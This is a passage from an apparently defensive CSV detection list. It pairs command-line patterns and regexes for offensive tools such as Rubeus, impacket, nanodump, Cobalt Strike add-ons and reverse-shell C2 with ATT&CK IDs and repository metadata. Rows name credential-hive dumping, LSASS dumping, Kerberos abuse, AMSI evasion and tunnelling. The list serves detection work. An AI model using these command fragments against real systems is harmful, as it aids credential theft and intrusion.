tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "* s4u * /bronzebit*",".{0,1000}\ss4u\s.{0,1000}\s\/bronzebit.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* s4u * /nopac*",".{0,1000}\ss4u\s.{0,1000}\s\/nopac.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* s4u * /ticket:*",".{0,1000}\ss4u\s.{0,1000}\s\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* s4u *.kirbi*",".{0,1000}\ss4u\s.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* s4u */rc4:* ",".{0,1000}\ss4u\s.{0,1000}\/rc4\:.{0,1000}\s","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* s7-info.nse*",".{0,1000}\ss7\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -sam * -system * -security * LOCAL > *.out*",".{0,1000}\s\-sam\s.{0,1000}\s\-system\s.{0,1000}\s\-security\s.{0,1000}\sLOCAL\s\>\s.{0,1000}\.out.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* samba-vuln-cve-2012-1182.nse*",".{0,1000}\ssamba\-vuln\-cve\-2012\-1182\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -SauronEye -Command *",".{0,1000}\s\-SauronEye\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* -save-old -dc-ip *",".{0,1000}\s\-save\-old\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -sc GetSyscallStub *",".{0,1000}\s\-sc\sGetSyscallStub\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* -sc SysWhispers3*",".{0,1000}\s\-sc\sSysWhispers3.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* scan * --dc-ip *",".{0,1000}\sscan\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* scan --github-org*",".{0,1000}\sscan\s\-\-github\-org.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1514","72","2024-04-29T15:26:13Z","2022-11-08T23:09:17Z" "* scan --github-user*",".{0,1000}\sscan\s\-\-github\-user.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1514","72","2024-04-29T15:26:13Z","2022-11-08T23:09:17Z" "* -Scan -ScanType 3 -File * -DisableRemediation -Trace -Level 0x10*",".{0,1000}\s\-Scan\s\-ScanType\s3\s\-File\s.{0,1000}\s\-DisableRemediation\s\-Trace\s\-Level\s0x10.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "* --scan-local-shares * -e *",".{0,1000}\s\-\-scan\-local\-shares\s.{0,1000}\s\-e\s.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","675","78","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "* Scanning Eventvwr registry! ..*",".{0,1000}\sScanning\sEventvwr\sregistry!\s\.\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* ScareCrow.go*",".{0,1000}\sScareCrow\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","0","N/A","10","10","446","69","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z" "* ScareCrow.go*",".{0,1000}\sScareCrow\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "* -SCCMHost * -Outfile *",".{0,1000}\s\-SCCMHost\s.{0,1000}\s\-Outfile\s.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","0","N/A","8","2","140","20","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z" "* -ScheduledTask -OnIdle *",".{0,1000}\s\-ScheduledTask\s\-OnIdle\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* scmuacbypass.cpp*",".{0,1000}\sscmuacbypass\.cpp.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","88","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "* scmuacbypass.exe*",".{0,1000}\sscmuacbypass\.exe.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","88","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "* --script dns-srv-enum *",".{0,1000}\s\-\-script\sdns\-srv\-enum\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --script http-ntlm-info *",".{0,1000}\s\-\-script\shttp\-ntlm\-info\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --script smb-enum-shares *",".{0,1000}\s\-\-script\ssmb\-enum\-shares\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --script smb-security-mode*smb-enum-shares *",".{0,1000}\s\-\-script\ssmb\-security\-mode.{0,1000}smb\-enum\-shares\s.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "* --script smb-vuln-*",".{0,1000}\s\-\-script\ssmb\-vuln\-.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","936","371","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "* --script=http-ntlm-info --script-args=http-ntlm-info.root=*",".{0,1000}\s\-\-script\=http\-ntlm\-info\s\-\-script\-args\=http\-ntlm\-info\.root\=.{0,1000}","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","0","N/A","N/A","4","340","56","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" "* --script=ldap-search -p *",".{0,1000}\s\-\-script\=ldap\-search\s\-p\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --script=realvnc-auth-bypass *",".{0,1000}\s\-\-script\=realvnc\-auth\-bypass\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --script-args dns-srv-enum.domain=*",".{0,1000}\s\-\-script\-args\sdns\-srv\-enum\.domain\=.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -ScriptString * -GetMinimallyObfuscated*",".{0,1000}\s\-ScriptString\s.{0,1000}\s\-GetMinimallyObfuscated.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "* -ScriptString * -PSAmsiScanner *",".{0,1000}\s\-ScriptString\s.{0,1000}\s\-PSAmsiScanner\s.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "* -seatbelt -Command *",".{0,1000}\s\-seatbelt\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* Seatbelt.Commands.Windows*",".{0,1000}\sSeatbelt\.Commands\.Windows.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "* SeatBelt.exe*",".{0,1000}\sSeatBelt\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* seatbelt_json.py*",".{0,1000}\sseatbelt_json\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* --seclogon-duplicate*",".{0,1000}\s\-\-seclogon\-duplicate.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "* secretsdump.py*",".{0,1000}\ssecretsdump\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* self_deletion.exe*",".{0,1000}\sself_deletion\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* SeriousSam.Execute *",".{0,1000}\sSeriousSam\.Execute\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","0","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "* --server * --cert-path *.pfx --elevate --target * --restore *",".{0,1000}\s\-\-server\s.{0,1000}\s\-\-cert\-path\s.{0,1000}\.pfx\s\-\-elevate\s\-\-target\s.{0,1000}\s\-\-restore\s.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "* --server * --cert-path *.pfx --elevate --target * --sid *",".{0,1000}\s\-\-server\s.{0,1000}\s\-\-cert\-path\s.{0,1000}\.pfx\s\-\-elevate\s\-\-target\s.{0,1000}\s\-\-sid\s.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "* --server * --type pass-pols*",".{0,1000}\s\-\-server\s.{0,1000}\s\-\-type\spass\-pols.{0,1000}","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","0","N/A","5","2","142","32","2024-03-25T13:05:26Z","2019-12-08T00:25:57Z" "* server -p 80 --reverse --socks5*",".{0,1000}\sserver\s\-p\s80\s\-\-reverse\s\-\-socks5.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - On our attacking machine (Linux in this case) we start a Chisel server on port 80 in reverse SOCKS5 mode.","T1071 - T1090 - T1102","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* server --restrict-http-upgrade-path-prefix *wss*",".{0,1000}\sserver\s\-\-restrict\-http\-upgrade\-path\-prefix\s.{0,1000}wss.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* server wss://[::]:*",".{0,1000}\sserver\swss\:\/\/\[\:\:\]\:.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* server.py -s tornado --cert /*pem --key /*.pem*",".{0,1000}\sserver\.py\s\-s\stornado\s\-\-cert\s\/.{0,1000}pem\s\-\-key\s\/.{0,1000}\.pem.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "* -ServerUri * 